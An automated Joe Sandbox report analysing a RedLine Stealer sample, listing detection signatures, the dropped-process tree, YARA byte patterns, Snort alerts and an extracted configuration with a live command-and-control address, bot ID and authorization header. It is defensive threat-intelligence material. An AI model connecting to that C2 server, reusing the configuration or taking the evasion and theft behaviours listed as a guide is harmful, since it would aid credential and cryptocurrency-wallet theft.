Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
W7ANVukbbj.exe

Overview

General Information

Sample Name:W7ANVukbbj.exe
Original Sample Name:093a149ea955420c85d54127e964879a.exe
Analysis ID:815798
MD5:093a149ea955420c85d54127e964879a
SHA1:ecef28b8b5ed66fc1226fc0c9e2ce98b89523e76
SHA256:fd7f4611b78c0f0b264159fcc744604e1a089f9faa381c8e4414a123ff568d19
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • W7ANVukbbj.exe (PID: 6056 cmdline: C:\Users\user\Desktop\W7ANVukbbj.exe MD5: 093A149EA955420C85D54127E964879A)
    • twl97yF91.exe (PID: 3776 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe MD5: 8B79F6A1B67F97CA971CEF540ABF22E7)
    • uPD30tM82.exe (PID: 5176 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe MD5: 763CFA2A099AC8748401DF32FF369ACE)
  • rundll32.exe (PID: 4184 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "193.233.20.23:4123", "Bot Id": "ramon", "Authorization Header": "3197576965d9513f115338c233015b40"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1a440:$pat14: , CommandLine:
        • 0x134ab:$v2_1: ListOfProcesses
        • 0x1328a:$v4_3: base64str
        • 0x13e03:$v4_4: stringKey
        • 0x11b63:$v4_5: BytesToStringConverted
        • 0x10d76:$v4_6: FromBase64
        • 0x12098:$v4_8: procName
        • 0x12813:$v5_5: FileScanning
        • 0x11d6c:$v5_7: RecordHeaderField
        • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
        SourceRuleDescriptionAuthorStrings
        00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 A8 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 A8 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
            0000000E.00000000.337013680.00000000002B2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 18 entries
              SourceRuleDescriptionAuthorStrings
              1.2.twl97yF91.exe.400000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                1.2.twl97yF91.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                • 0x1300:$s3: 83 EC 38 53 B0 A8 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                • 0x1fdd0:$s5: delete[]
                • 0x1f288:$s6: constructor or from DllMain.
                0.3.W7ANVukbbj.exe.4a26820.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.3.W7ANVukbbj.exe.4a26820.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x18840:$pat14: , CommandLine:
                  • 0x118ab:$v2_1: ListOfProcesses
                  • 0x1168a:$v4_3: base64str
                  • 0x12203:$v4_4: stringKey
                  • 0xff63:$v4_5: BytesToStringConverted
                  • 0xf176:$v4_6: FromBase64
                  • 0x10498:$v4_8: procName
                  • 0x10c13:$v5_5: FileScanning
                  • 0x1016c:$v5_7: RecordHeaderField
                  • 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  1.2.twl97yF91.exe.2f97bc6.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 32 entries
                    No Sigma rule has matched
                    Timestamp:192.168.2.3193.233.20.234973641232043233 02/27/23-09:31:19.481059
                    SID:2043233
                    Source Port:49736
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3193.233.20.234973641232043231 02/27/23-09:31:37.882033
                    SID:2043231
                    Source Port:49736
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3193.233.20.234969941232043233 02/27/23-09:30:29.261461
                    SID:2043233
                    Source Port:49699
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:193.233.20.23192.168.2.34123497362043234 02/27/23-09:31:21.995610
                    SID:2043234
                    Source Port:4123
                    Destination Port:49736
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3193.233.20.234969941232043231 02/27/23-09:30:46.338879
                    SID:2043231
                    Source Port:49699
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:193.233.20.23192.168.2.34123496992043234 02/27/23-09:30:34.424527
                    SID:2043234
                    Source Port:4123
                    Destination Port:49699
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: W7ANVukbbj.exeReversingLabs: Detection: 71%
                    Source: W7ANVukbbj.exeVirustotal: Detection: 48%Perma Link
                    Source: W7ANVukbbj.exeAvira: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeReversingLabs: Detection: 64%
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeReversingLabs: Detection: 76%
                    Source: W7ANVukbbj.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exeJoe Sandbox ML: detected
                    Source: 00000001.00000003.257010194.0000000002ECF000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.20.23:4123", "Bot Id": "ramon", "Authorization Header": "3197576965d9513f115338c233015b40"}
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00862F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00862F1D

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeUnpacked PE file: 1.2.twl97yF91.exe.400000.0.unpack
                    Source: W7ANVukbbj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: W7ANVukbbj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: wextract.pdb source: W7ANVukbbj.exe
                    Source: Binary string: wextract.pdbGCTL source: W7ANVukbbj.exe
                    Source: Binary string: ,C:\fokizacawova\vamisobel.pdb source: W7ANVukbbj.exe, 00000000.00000003.254929355.00000000049C9000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000000.255172921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, twl97yF91.exe.0.dr
                    Source: Binary string: _.pdb source: twl97yF91.exe, 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.322488235.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000003.259177434.0000000002F0D000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\fokizacawova\vamisobel.pdb source: W7ANVukbbj.exe, 00000000.00000003.254929355.00000000049C9000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000000.255172921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, twl97yF91.exe.0.dr
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exeCode function: 0_2_00862390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00862390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h1_2_0305EE30

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49699 -> 193.233.20.23:4123
                    Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49699 -> 193.233.20.23:4123
                    Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.23:4123 -> 192.168.2.3:49699
                    Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49736 -> 193.233.20.23:4123
                    Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49736 -> 193.233.20.23:4123
                    Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.23:4123 -> 192.168.2.3:49736
                    Source: Malware configuration extractorURLs: 193.233.20.23:4123
                    Source: Joe Sandbox ViewASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
                    Source: Joe Sandbox ViewIP Address: 193.233.20.23 193.233.20.23
                    Source: global trafficTCP traffic: 192.168.2.3:49699 -> 193.233.20.23:4123
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
